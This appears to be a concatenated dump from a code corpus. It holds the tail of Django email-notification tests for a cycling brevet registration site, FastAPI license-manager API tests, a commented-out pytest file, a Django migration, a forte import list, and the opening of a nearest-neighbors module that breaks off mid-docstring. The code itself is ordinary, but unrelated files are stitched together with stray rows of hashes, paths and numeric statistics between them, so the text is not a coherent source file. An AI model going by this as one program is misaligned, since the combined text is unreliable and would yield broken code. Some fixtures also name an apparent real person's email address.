from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertEqual(
mail.outbox[0].extra_headers['Sender'],
'randopony@randonneurs.bc.ca')
def test_email_reply_to(self):
"""email to rider has correct reply-to address header
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertEqual(
mail.outbox[0].extra_headers['Reply-To'], 'djl@douglatornell.ca')
def test_email_reply_to_2_organizers(self):
"""email to rider has 2 organizers in reply-to header
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='VI', event=600, date=date(2010, 8, 7))
rider = BrevetRider.objects.get(
first_name='Ken', last_name='Bonner', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertEqual(
mail.outbox[0].extra_headers['Reply-To'],
'mcroy@example.com, dug.andrusiek@example.com')
def test_email_confirm_brevet_registration_msg(self):
"""email to rider has correct brevet pre-registration confirmation msg
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'pre-registered for the BC Randonneurs LM400 22-May-2010 brevet',
mail.outbox[0].body)
def test_email_brevet_url(self):
"""email to rider has correct brevet page url
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'<http://testserver/register/LM400/22May2010/>',
mail.outbox[0].body)
def test_email_event_waiver_msg(self):
"""email to rider has correct event waiver message
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'print out the event waiver form',
mail.outbox[0].body)
def test_email_event_waiver_url(self):
"""email to rider has correct event waiver url
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'<http://www.randonneurs.bc.ca/organize/eventform.pdf>',
mail.outbox[0].body)
def test_email_organizer_contact_msg(self):
"""email to rider has correct "reply to contact organizer" msg
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=400, date=date(2010, 5, 22))
rider = BrevetRider.objects.get(
first_name='Doug', last_name='Latornell', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'auto-generated email, but you can reply to it '
'to contact the brevet organizer(s).',
mail.outbox[0].body)
def test_email_non_member_msg(self):
"""email to rider has correct non-member message
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=200, date=date(2012, 3, 17))
rider = BrevetRider.objects.get(
first_name='Fibber', last_name='McGee', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'indicated that you are NOT a member',
mail.outbox[0].body)
def test_email_membership_form_url(self):
"""email to rider has correct membership form & waiver url
"""
from ..models import Brevet
from ..models import BrevetRider
brevet = Brevet.objects.get(
region='LM', event=200, date=date(2012, 3, 17))
rider = BrevetRider.objects.get(
first_name='Fibber', last_name='McGee', brevet=brevet)
self._send_one(brevet.pk, rider.pk, 'testserver')
self.assertIn(
'<http://www.randonneurs.bc.ca/organize/'
'2012_membership-and-waiver.pdf>',
mail.outbox[0].body)
class TestEmailToOrganizer(django.test.TestCase):
    """Unit tests for email_to_organizer task function.
    """
    fixtures = ['brevets.yaml', 'riders.yaml',
                'email_addresses.yaml', 'links.yaml']

    def _get_target_function(self):
        from ..tasks import email_to_organizer
        return email_to_organizer

    def _send_one(self, *args, **kwargs):
        self._get_target_function()(*args, **kwargs)

    def _send_for_rider(self, region, event, brevet_date, first, last):
        """Look up the fixture brevet & rider and run the task for them.
        """
        from ..models import Brevet
        from ..models import BrevetRider
        brevet = Brevet.objects.get(
            region=region, event=event, date=brevet_date)
        rider = BrevetRider.objects.get(
            first_name=first, last_name=last, brevet=brevet)
        self._send_one(brevet.pk, rider.pk, 'testserver')

    def test_email_subject(self):
        """email to organizer has correct subject
        """
        self._send_for_rider(
            'LM', 400, date(2010, 5, 22), 'Doug', 'Latornell')
        self.assertEqual(
            mail.outbox[0].subject,
            'Doug Latornell has Pre-registered for the LM400 22-May-2010')

    def test_email_to(self):
        """email to organizer has correct to address
        """
        self._send_for_rider(
            'LM', 400, date(2010, 5, 22), 'Doug', 'Latornell')
        self.assertEqual(
            mail.outbox[0].to, ['djl@douglatornell.ca'])

    def test_email_to_2_organizers(self):
        """email to organizer goes to multiple organizers
        """
        self._send_for_rider(
            'VI', 600, date(2010, 8, 7), 'Ken', 'Bonner')
        self.assertEqual(
            mail.outbox[0].to,
            ['mcroy@example.com', 'dug.andrusiek@example.com'])

    def test_email_from(self):
        """email to organizer has correct from address
        """
        self._send_for_rider(
            'LM', 400, date(2010, 5, 22), 'Doug', 'Latornell')
        self.assertEqual(
            mail.outbox[0].from_email, 'randopony@randonneurs.bc.ca')

    def test_email_confirm_brevet_registration_msg(self):
        """email to organizer has correct pre-registration confirmation msg
        """
        self._send_for_rider(
            'LM', 400, date(2010, 5, 22), 'Doug', 'Latornell')
        self.assertIn(
            'Doug Latornell <djl@douglatornell.ca> has pre-registered for the '
            'LM400 22-May-2010 brevet',
            mail.outbox[0].body)

    def test_email_confirm_brevet_url(self):
        """email to organizer has correct brevet page url
        """
        self._send_for_rider(
            'LM', 400, date(2010, 5, 22), 'Doug', 'Latornell')
        self.assertIn(
            '<http://testserver/register/LM400/22May2010/>',
            mail.outbox[0].body)

    def test_email_confirm_rider_list_spreadsheet_url(self):
        """email to organizer has correct rider list spreadsheet url
        """
        self._send_for_rider(
            'LM', 400, date(2010, 5, 22), 'Doug', 'Latornell')
        self.assertIn(
            'https://spreadsheets.google.com/ccc?key=bar',
            mail.outbox[0].body)

    def test_email_is_club_member_msg(self):
        """email to organizer has correct club membership true msg
        """
        self._send_for_rider(
            'LM', 400, date(2010, 5, 22), 'Doug', 'Latornell')
        self.assertIn(
            'has indicated that zhe is a club member', mail.outbox[0].body)

    def test_email_non_member_msg(self):
        """email to organizer has correct non-member message
        """
        self._send_for_rider(
            'LM', 200, date(2012, 3, 17), 'Fibber', 'McGee')
        self.assertIn(
            'has indicated that zhe is NOT a club member',
            mail.outbox[0].body)

    def test_email_member_before_start_msg(self):
        """email to organizer has msg re: joining club before brevet start
        """
        self._send_for_rider(
            'LM', 200, date(2012, 3, 17), 'Fibber', 'McGee')
        self.assertIn(
            'join beforehand, or at the start', mail.outbox[0].body)

    def test_email_qualifying_info(self):
        """email to organizer has answer to qualifying info question
        """
        self._send_for_rider(
            'LM', 400, date(2010, 5, 22), 'Doug', 'Latornell')
        self.assertIn(
            'LM300 1-May-2010', mail.outbox[0].body)

    def test_email_admin_contact_msg(self):
        """email to organizer has correct admin contact email address msg
        """
        self._send_for_rider(
            'LM', 400, date(2010, 5, 22), 'Doug', 'Latornell')
        self.assertIn(
            'please send email to <{0}>'.format(settings.ADMINS[0][1]),
            mail.outbox[0].body)
| 40.426702
| 79
| 0.614259
| 1,869
| 15,443
| 4.954521
| 0.093633
| 0.053996
| 0.086393
| 0.059395
| 0.894708
| 0.884125
| 0.868251
| 0.818143
| 0.77743
| 0.765875
| 0
| 0.030517
| 0.267953
| 15,443
| 381
| 80
| 40.532808
| 0.788589
| 0.108722
| 0
| 0.827586
| 0
| 0
| 0.131562
| 0.013509
| 0
| 0
| 0
| 0
| 0.086207
| 1
| 0.1
| false
| 0
| 0.193103
| 0
| 0.313793
| 0.003448
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9dff2e1148fd3e965cf5d7d9b2cf87c43528db7b
| 14,004
|
py
|
Python
|
backend/tests/api/test_license.py
|
omnivector-solutions/license-manager
|
9eb1e4569d692aef83a2388096e7413bc010be61
|
[
"MIT"
] | 2
|
2020-11-15T22:54:39.000Z
|
2022-02-15T07:58:55.000Z
|
backend/tests/api/test_license.py
|
omnivector-solutions/license-manager
|
9eb1e4569d692aef83a2388096e7413bc010be61
|
[
"MIT"
] | 2
|
2022-02-18T19:36:45.000Z
|
2022-03-16T23:07:44.000Z
|
backend/tests/api/test_license.py
|
omnivector-solutions/license-manager
|
9eb1e4569d692aef83a2388096e7413bc010be61
|
[
"MIT"
] | null | null | null |
from unittest import mock
from fastapi import HTTPException, status
from httpx import AsyncClient
from pytest import mark, raises
from lm_backend.api import license
from lm_backend.api.permissions import Permissions
from lm_backend.api_schemas import BookingRow, LicenseUseReconcile, LicenseUseReconcileRequest
from lm_backend.storage import database
from lm_backend.table_schemas import booking_table, config_table, license_table
def test_license_use_available():
    """
    Do we correctly calculate available on a LicenseUse object
    """
    usage = license.LicenseUse(product_feature="hello.world", total=100, used=81)
    # available is the derived headroom: total - used
    assert usage.available == 19
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_get_these_licenses(some_licenses, insert_objects):
    """
    Make sure we get these licenses
    """
    await insert_objects(some_licenses, license_table)
    expected = [
        license.LicenseUse(product_feature="cool.beans", total=11, used=11),
        license.LicenseUse(product_feature="hello.world", total=100, used=19),
    ]
    fetched = await license._get_these_licenses(["hello.world", "cool.beans"])
    assert fetched == expected
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_find_license_updates_and_inserts(some_licenses):
    """
    Do we correctly match a list of objects against the database and
    determine which are new and which are updating?
    """
    # initially, everything should be an insert
    updates, inserts = await license._find_license_updates_and_inserts(some_licenses)
    assert len(updates) == 0
    assert len(inserts) == 3
    # let's insert 2 of the three
    del inserts["cool.beans"]
    await database.execute_many(query=license_table.insert(), values=[i.dict() for i in inserts.values()])
    # try again, now 2 should be updates and 1 should be an insert
    updates, inserts = await license._find_license_updates_and_inserts(some_licenses)
    assert list(updates.keys()) == ["hello.dolly", "hello.world"]
    assert list(inserts.keys()) == ["cool.beans"]
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_licenses_product__success(
    backend_client: AsyncClient,
    some_licenses,
    insert_objects,
    inject_security_header,
):
    """
    Do I fetch and order the licenses in the db?
    """
    await insert_objects(some_licenses, license_table)
    inject_security_header("owner1", Permissions.LICENSE_VIEW)
    response = await backend_client.get("/lm/api/v1/license/use/hello")
    assert response.status_code == status.HTTP_200_OK
    # both "hello.*" rows, ordered by product_feature
    expected = [
        dict(product_feature="hello.dolly", total=80, used=11, available=69),
        dict(product_feature="hello.world", total=100, used=19, available=81),
    ]
    assert response.json() == expected
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_licenses_product__fail_on_bad_permission(
    backend_client: AsyncClient,
    some_licenses,
    insert_objects,
    inject_security_header,
):
    """
    Do I return a 401 or 403 if permissions are missing or invalid?
    """
    await insert_objects(some_licenses, license_table)
    # no auth header at all -> unauthorized
    response = await backend_client.get("/lm/api/v1/license/use/hello")
    assert response.status_code == status.HTTP_401_UNAUTHORIZED
    # wrong permission string -> forbidden
    inject_security_header("owner1", "invalid-permission")
    response = await backend_client.get("/lm/api/v1/license/use/hello")
    assert response.status_code == status.HTTP_403_FORBIDDEN
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_licenses_product_feature__success(
    backend_client: AsyncClient,
    some_licenses,
    insert_objects,
    inject_security_header,
):
    """
    Do I fetch and order the licenses in the db?
    """
    await insert_objects(some_licenses, license_table)
    inject_security_header("owner1", Permissions.LICENSE_VIEW)
    response = await backend_client.get("/lm/api/v1/license/use/cool/beans")
    assert response.status_code == status.HTTP_200_OK
    # exactly the one matching product.feature row
    expected = [
        dict(product_feature="cool.beans", total=11, used=11, available=0),
    ]
    assert response.json() == expected
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_licenses_product_feature__fail_on_bad_permission(
    backend_client: AsyncClient,
    some_licenses,
    insert_objects,
    inject_security_header,
):
    """
    Do I return a 401 or 403 if permissions are missing or invalid?
    """
    await insert_objects(some_licenses, license_table)
    # no auth header at all -> unauthorized
    response = await backend_client.get("/lm/api/v1/license/use/cool/beans")
    assert response.status_code == status.HTTP_401_UNAUTHORIZED
    # wrong permission string -> forbidden
    inject_security_header("owner1", "invalid-permission")
    response = await backend_client.get("/lm/api/v1/license/use/cool/beans")
    assert response.status_code == status.HTTP_403_FORBIDDEN
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_licenses_all__success(
    backend_client: AsyncClient, some_licenses, insert_objects, inject_security_header
):
    """
    Do I fetch and order the licenses in the db?
    """
    await insert_objects(some_licenses, license_table)
    inject_security_header("owner1", Permissions.LICENSE_VIEW)
    response = await backend_client.get("/lm/api/v1/license/all")
    assert response.status_code == 200
    # default ordering: by product_feature
    expected = [
        dict(product_feature="cool.beans", total=11, used=11, available=0),
        dict(product_feature="hello.dolly", total=80, used=11, available=69),
        dict(product_feature="hello.world", total=100, used=19, available=81),
    ]
    assert response.json() == expected
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_licenses_all__with_search(
    backend_client: AsyncClient, some_licenses, insert_objects, inject_security_header
):
    """
    Do I fetch and filter by the supplied search term the licenses in the db?
    """
    await insert_objects(some_licenses, license_table)
    inject_security_header("owner1", Permissions.LICENSE_VIEW)
    response = await backend_client.get("/lm/api/v1/license/all?search=dolly")
    assert response.status_code == 200
    # only the row matching the search term comes back
    expected = [
        dict(product_feature="hello.dolly", total=80, used=11, available=69),
    ]
    assert response.json() == expected
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_licenses_all__with_sort(
    backend_client: AsyncClient, some_licenses, insert_objects, inject_security_header
):
    """
    Do I fetch and order the licenses in the db by the supplied sort params?

    Renamed from ``test_licenses_all__success``: the module already defines a
    test with that name above, so this definition shadowed it and the earlier
    test was never collected or run by pytest.
    """
    await insert_objects(some_licenses, license_table)
    inject_security_header("owner1", Permissions.LICENSE_VIEW)
    resp = await backend_client.get("/lm/api/v1/license/all?sort_field=total&sort_ascending=false")
    assert resp.status_code == 200
    # descending by total: 100, 80, 11
    assert resp.json() == [
        dict(product_feature="hello.world", total=100, used=19, available=81),
        dict(
            product_feature="hello.dolly",
            total=80,
            used=11,
            available=69,
        ),
        dict(product_feature="cool.beans", total=11, used=11, available=0),
    ]
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_licenses_all__fail_on_bad_permission(
    backend_client: AsyncClient, some_licenses, insert_objects, inject_security_header
):
    """
    Do I return a 401 or 403 if permissions are missing or invalid?
    """
    await insert_objects(some_licenses, license_table)
    # No Permission (no auth header injected at all)
    resp = await backend_client.get("/lm/api/v1/license/all")
    assert resp.status_code == 401
    # Invalid Permission
    # NOTE(review): sibling tests use "invalid-permission" (hyphen); any
    # non-matching string should give the same 403 — confirm.
    inject_security_header("owner1", "invalid_permission")
    resp = await backend_client.get("/lm/api/v1/license/all")
    assert resp.status_code == 403
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_delete_if_in_use_booking(insert_objects, some_licenses, some_config_rows, some_booking_rows):
    """
    Make sure the given LicenseUseReconcileRequest gets deleted only if the pair booked, lead_host,
    user_name and product_feature exists in the booking table.
    """
    await insert_objects(some_config_rows, config_table)
    await insert_objects(some_booking_rows, booking_table)
    await insert_objects(some_licenses, license_table)
    # five in-use entries, all from the same host/user
    used_licenses = [
        {"booked": booked, "lead_host": "host1", "user_name": "user1"}
        for booked in (19, 11, 12, 13, 14)
    ]
    reconcile_request = LicenseUseReconcileRequest(
        used=19, product_feature="hello.world", total=100, used_licenses=used_licenses
    )
    await license._delete_if_in_use_booking(reconcile_request)
    remaining = await database.fetch_all(booking_table.select())
    assert len(remaining) == len(some_booking_rows) - 1  # i.e. one got deleted
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_delete_if_in_use_booking_empty(
    insert_objects, some_licenses, some_config_rows, some_booking_rows
):
    """
    Check if the function works well given an empty used_licenses and doesn't delete anything
    from the booking_table.
    """
    await insert_objects(some_config_rows, config_table)
    await insert_objects(some_booking_rows, booking_table)
    await insert_objects(some_licenses, license_table)
    reconcile_request = LicenseUseReconcileRequest(
        used=19, product_feature="hello.world", total=100, used_licenses=[]
    )
    await license._delete_if_in_use_booking(reconcile_request)
    remaining = await database.fetch_all(booking_table.select())
    # nothing matched, so nothing was deleted
    assert len(remaining) == len(some_booking_rows)
@mark.asyncio
@mock.patch("lm_backend.api.license._delete_if_in_use_booking")
@database.transaction(force_rollback=True)
async def test_clean_up_in_use_booking_conversion(delete_in_use_mock: mock.AsyncMock):
    """
    Check if the _clean_up_in_use_booking actually converts the data type and calls the
    _delete_if_in_use_booking.
    """
    used_licenses = [
        {"booked": booked, "lead_host": "host1", "user_name": "user1"}
        for booked in (19, 11, 12, 13, 14)
    ]
    reconcile_requests = [
        LicenseUseReconcileRequest(
            used=19, product_feature="hello.world", total=100, used_licenses=used_licenses
        ),
        LicenseUseReconcileRequest(
            used=11, product_feature="hello.dolly", total=100, used_licenses=used_licenses
        ),
    ]
    converted = await license._clean_up_in_use_booking(reconcile_requests)
    assert len(converted) == len(reconcile_requests)
    # every element was converted to the plain LicenseUseReconcile type
    assert all(isinstance(item, LicenseUseReconcile) for item in converted)
    # the clean-up helper was awaited once per request
    assert delete_in_use_mock.await_count == 2
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_reconcile_changes_clean_up_in_use_bookings__success(
    insert_objects,
    some_licenses,
    some_config_rows,
    some_booking_rows,
    backend_client,
    inject_security_header,
):
    """
    Make sure the /reconcile endpoint correct handle the in use cleanup.
    """
    await insert_objects(some_config_rows, config_table)
    await insert_objects(some_booking_rows, booking_table)
    await insert_objects(some_licenses, license_table)
    reconcile_request = LicenseUseReconcileRequest(
        used=19,
        product_feature="hello.world",
        total=100,
        used_licenses=[{"booked": 19, "lead_host": "host1", "user_name": "user1"}],
    )
    inject_security_header("owner1", Permissions.LICENSE_EDIT)
    response = await backend_client.patch(
        "/lm/api/v1/license/reconcile", json=[reconcile_request.dict()]
    )
    assert response.status_code == status.HTTP_200_OK
    remaining = await database.fetch_all(booking_table.select())
    assert len(remaining) == len(some_booking_rows) - 1  # i.e. one got deleted
@mark.asyncio
@database.transaction(force_rollback=True)
async def test_reconcile_changes_clean_up_in_use_bookings__fail_on_bad_permission(
    insert_objects,
    some_licenses,
    some_config_rows,
    some_booking_rows,
    backend_client,
    inject_security_header,
):
    """
    Do I return a 401 or 403 if permissions are missing or invalid?
    """
    await insert_objects(some_config_rows, config_table)
    await insert_objects(some_booking_rows, booking_table)
    await insert_objects(some_licenses, license_table)
    reconcile_request = LicenseUseReconcileRequest(
        used=19,
        product_feature="hello.world",
        total=100,
        used_licenses=[{"booked": 19, "lead_host": "host1", "user_name": "user1"}],
    )
    # no auth header at all -> unauthorized
    response = await backend_client.patch(
        "/lm/api/v1/license/reconcile", json=[reconcile_request.dict()]
    )
    assert response.status_code == status.HTTP_401_UNAUTHORIZED
    # wrong permission string -> forbidden
    inject_security_header("owner1", "invalid-permission")
    response = await backend_client.patch(
        "/lm/api/v1/license/reconcile", json=[reconcile_request.dict()]
    )
    assert response.status_code == status.HTTP_403_FORBIDDEN
| 33.663462
| 108
| 0.709654
| 1,760
| 14,004
| 5.360795
| 0.118182
| 0.046847
| 0.045045
| 0.048967
| 0.811553
| 0.799152
| 0.786433
| 0.777742
| 0.76725
| 0.756015
| 0
| 0.022371
| 0.189232
| 14,004
| 415
| 109
| 33.744578
| 0.808614
| 0.026921
| 0
| 0.742268
| 0
| 0
| 0.104996
| 0.038924
| 0
| 0
| 0
| 0
| 0.109966
| 1
| 0.003436
| false
| 0
| 0.030928
| 0
| 0.034364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ae3d5690e77dedad9006a5f25e41fbaaa2d6b355
| 2,234
|
py
|
Python
|
app/python/testing/modules_and_functions/test_cluster_filter.py
|
RadjaHachilif/agotool
|
2fcc3fd5a156053b528ec927bab79ddaf7af2dec
|
[
"MIT"
] | 6
|
2016-04-14T11:47:43.000Z
|
2022-01-29T14:34:59.000Z
|
app/python/testing/modules_and_functions/test_cluster_filter.py
|
RadjaHachilif/agotool
|
2fcc3fd5a156053b528ec927bab79ddaf7af2dec
|
[
"MIT"
] | 2
|
2019-12-21T12:15:46.000Z
|
2021-01-08T12:22:17.000Z
|
app/python/testing/modules_and_functions/test_cluster_filter.py
|
RadjaHachilif/agotool
|
2fcc3fd5a156053b528ec927bab79ddaf7af2dec
|
[
"MIT"
] | 1
|
2021-03-04T10:26:18.000Z
|
2021-03-04T10:26:18.000Z
|
# import sys, os
# sys.path.insert(0, os.path.dirname(os.path.abspath(os.path.realpath(__file__))))
#
# import pytest
# import requests
# import ast
#
# import variables, cluster_filter
#
#
# def test_filter_parents_if_same_foreground(example_output_genome, pqo_STRING):
# df = example_output_genome
# df["level"] = df["id"].apply(lambda term: pqo_STRING.functerm_2_level_dict[term])
# df_after = cluster_filter.filter_parents_if_same_foreground(df, pqo_STRING.functerm_2_level_dict)
# # check that number of rows decreases or stays the same
# assert example_output_genome.shape[0] >= df_after.shape[0]
# assert sum(example_output_genome.duplicated()) == 0
# assert sum(df_after.duplicated()) == 0
#
# def test_filter_parents_if_same_foreground_2(example_output_genome, pqo_STRING):
# df = example_output_genome
# df["level"] = df["id"].apply(lambda term: pqo_STRING.functerm_2_level_dict[term])
# assert sum(example_output_genome.duplicated()) == 0
# example_output_genome = cluster_filter.filter_parents_if_same_foreground(df, pqo_STRING.functerm_2_level_dict)
# # check that number of rows decreases or stays the same
# assert sum(example_output_genome.duplicated()) == 0
#
# def test_filter_parents_if_same_foreground_v2(example_output_genome, pqo_STRING):
# df = example_output_genome
# df["level"] = df["id"].apply(lambda term: pqo_STRING.functerm_2_level_dict[term])
# df_after = cluster_filter.filter_parents_if_same_foreground_v2(example_output_genome)
# # check that number of rows decreases or stays the same
# assert example_output_genome.shape[0] >= df_after.shape[0]
# assert sum(example_output_genome.duplicated()) == 0
# assert sum(df_after.duplicated()) == 0
#
# def test_filter_parents_if_same_foreground_2_v2(example_output_genome, pqo_STRING):
# df = example_output_genome
# df["level"] = df["id"].apply(lambda term: pqo_STRING.functerm_2_level_dict[term])
# assert sum(example_output_genome.duplicated()) == 0
# example_output_genome = cluster_filter.filter_parents_if_same_foreground_v2(df)
# # check that number of rows decreases or stays the same
# assert sum(example_output_genome.duplicated()) == 0
#
| 49.644444
| 117
| 0.754252
| 323
| 2,234
| 4.835913
| 0.160991
| 0.158131
| 0.231114
| 0.097311
| 0.911012
| 0.911012
| 0.911012
| 0.887964
| 0.886684
| 0.850192
| 0
| 0.012953
| 0.136079
| 2,234
| 44
| 118
| 50.772727
| 0.796373
| 0.958371
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ae49589e940ad167ea2313725e4e4a5ef97de3a4
| 2,618
|
py
|
Python
|
association/migrations/0005_auto_20210503_2140.py
|
bpprc/database
|
6e8302729793ddf840630840bd08c96ddd35a52e
|
[
"BSD-3-Clause"
] | 1
|
2021-04-14T16:54:57.000Z
|
2021-04-14T16:54:57.000Z
|
association/migrations/0005_auto_20210503_2140.py
|
bpprc/database
|
6e8302729793ddf840630840bd08c96ddd35a52e
|
[
"BSD-3-Clause"
] | null | null | null |
association/migrations/0005_auto_20210503_2140.py
|
bpprc/database
|
6e8302729793ddf840630840bd08c96ddd35a52e
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by Django 3.1.4 on 2021-05-04 02:40
from django.db import migrations, models
class Migration(migrations.Migration):
    """Make the listed Association text columns nullable."""

    dependencies = [
        ("association", "0004_auto_20210503_2133"),
    ]

    # Every column below gets the identical change (nullable TextField), so
    # the repetitive AlterField operations are built from the name list.
    operations = [
        migrations.AlterField(
            model_name="association",
            name=field_name,
            field=models.TextField(null=True),
        )
        for field_name in (
            "assay_material",
            "assay_method",
            "comment",
            "data_entered_by",
            "instar",
            "lc50",
            "life_stage",
            "non_toxic",
            "other_citations",
            "percentage_mortality",
            "publication",
            "target_order",
            "target_species",
            "taxonid",
            "units",
        )
    ]
| 29.41573
| 51
| 0.539725
| 219
| 2,618
| 6.324201
| 0.251142
| 0.216607
| 0.270758
| 0.314079
| 0.795668
| 0.775451
| 0.775451
| 0.736462
| 0.736462
| 0.736462
| 0
| 0.01931
| 0.347212
| 2,618
| 88
| 52
| 29.75
| 0.791106
| 0.017189
| 0
| 0.731707
| 1
| 0
| 0.140023
| 0.008946
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012195
| 0
| 0.04878
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
881d8d281f43d6eed77d3efc8551c6adc6176b5c
| 240
|
py
|
Python
|
forte/processors/__init__.py
|
huzecong/forte
|
beae4e923c9a6873b582588972e6ec9919079271
|
[
"Apache-2.0"
] | null | null | null |
forte/processors/__init__.py
|
huzecong/forte
|
beae4e923c9a6873b582588972e6ec9919079271
|
[
"Apache-2.0"
] | null | null | null |
forte/processors/__init__.py
|
huzecong/forte
|
beae4e923c9a6873b582588972e6ec9919079271
|
[
"Apache-2.0"
] | null | null | null |
from forte.processors.ner_predictor import *
from forte.processors.sentence_predictor import *
from forte.processors.srl_predictor import *
from forte.processors.txtgen_predictor import *
from forte.processors.vocabulary_processor import *
| 40
| 51
| 0.854167
| 30
| 240
| 6.666667
| 0.366667
| 0.225
| 0.475
| 0.48
| 0.68
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 240
| 5
| 52
| 48
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
88364c58c415806a690fe3bddd95a2e43daaaf59
| 46,580
|
py
|
Python
|
sparse_neighbors_search/neighbors/nearestNeighborsCppInterface.py
|
joachimwolff/sparse-neighbors-search
|
0a827108f975e6dcda55bcd2d68beb3b86f23bee
|
[
"MIT"
] | 10
|
2015-07-28T07:17:02.000Z
|
2020-05-11T08:14:44.000Z
|
sparse_neighbors_search/neighbors/nearestNeighborsCppInterface.py
|
joachimwolff/minHashNearestNeighbors
|
0a827108f975e6dcda55bcd2d68beb3b86f23bee
|
[
"MIT"
] | null | null | null |
sparse_neighbors_search/neighbors/nearestNeighborsCppInterface.py
|
joachimwolff/minHashNearestNeighbors
|
0a827108f975e6dcda55bcd2d68beb3b86f23bee
|
[
"MIT"
] | 2
|
2016-08-11T14:00:05.000Z
|
2017-03-23T19:06:29.000Z
|
# Copyright 2016, 2017, 2018, 2019, 2020 Joachim Wolff
# PhD Thesis
#
# Copyright 2015, 2016 Joachim Wolff
# Master Thesis
# Tutor: Fabrizio Costa
# Winter semester 2015/2016
#
# Chair of Bioinformatics
# Department of Computer Science
# Faculty of Engineering
# Albert-Ludwigs-University Freiburg im Breisgau
__author__ = 'joachimwolff'
import multiprocessing as mp
from scipy.sparse import csr_matrix
from sklearn.random_projection import SparseRandomProjection
from sklearn import random_projection
from sklearn.utils import check_X_y
from numpy import asarray
import numpy as np
import math
import _nearestNeighbors
class _NearestNeighborsCppInterface():
"""Approximate unsupervised learner for implementing neighbor searches on sparse data sets. Based on a
dimension reduction with minimum hash functions or winner takes it all hashing.
Parameters
----------
n_neighbors : int, optional (default = 5)
Number of neighbors to use by default for :meth:`k_neighbors` queries.
radius : float, optional (default = 1.0)
Range of parameter space to use by default for :meth`radius_neighbors`
queries.
fast : {True, False}, optional (default = False)
- True: will only use an inverse index to compute a k_neighbor query.
- False: an inverse index is used to preselect instances, and these are used to get
the original data from the data set to answer a k_neighbor query. The
